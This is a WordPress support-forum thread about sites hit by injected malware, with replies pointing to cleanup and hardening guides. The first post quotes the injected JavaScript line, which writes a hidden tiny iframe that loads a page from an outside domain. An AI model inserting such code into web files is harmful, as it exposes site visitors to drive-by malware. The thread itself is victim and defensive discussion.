WordPress.org

Ready to get started?Download WordPress

Forums

Latest Malware Attacks and Solution (7 posts)

  1. M. Samiullah
    Member
    Posted 1 year ago #

    I was facing frequent malware attacks on my wordpress site. Code injection was in this file wp-includes/js/comment-reply.min.js?ver=3.5.1. The code is with different urls like griebwal and many more.

    [document.write('<iframe name=Twitter scrolling=auto framebor
    der=no align=center height=2 width=2 src=http://168bet.com/c
    ocs.html?j=1194757></iframe>');]

    I removed this successfully and now my site is secure. I write a complete solution at this link.
    http://semioffice.com/wordpress/latest-malware-attacks-on-wordpress-sites-and-its-solution/

  2. catacaustic
    Member
    Posted 1 year ago #

    That's not a "solution". All you'v eodne is place the original file back there again. You didn't address anything about security, how to stop the attack/hack happening again, and what users should be looking for o doing in order to block things like this before they happen. I'm glad you ogt it working again, but you've only given around 10% of the actual solution there.

  3. Alex Poole
    Member
    Posted 1 year ago #

    I'm having the same problem, have manually removed the inserted code twice, then re-installed WP, but of course this hasn't solved the issue - it just keeps on coming back. I will sit down and attempt to fix this properly. Will report back.

  4. Andrew
    Forum Moderator
    Posted 1 year ago #

    @Alex_Poole, you can discuss that on your own thread.

  5. osu9400
    Member
    Posted 1 year ago #

    having the same problem. HAs anyone figured out a solution?

  6. DJDoubleXL189
    Member
    Posted 1 year ago #

    Not that it's been posted countless times, but here are the links you need to clean your site. Additionally, you'll want to make sure that you're not using a theme that doesn't comply with WordPress standards. Themes that are older often run into such problems. You'll also want to make sure you have the latest versions of your plugins installed. Any plugins that haven't been updated in some time should be replaced.

    You need to start working your way through these resources:
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://codex.wordpress.org/Hardening_WordPress

    Additional Resources:
    http://sitecheck.sucuri.net/scanner/
    http://www.unmaskparasites.com/
    http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html

  7. WPyogi
    Volunteer Moderator
    Posted 1 year ago #

Topic Closed

This topic has been closed to new replies.

About this Topic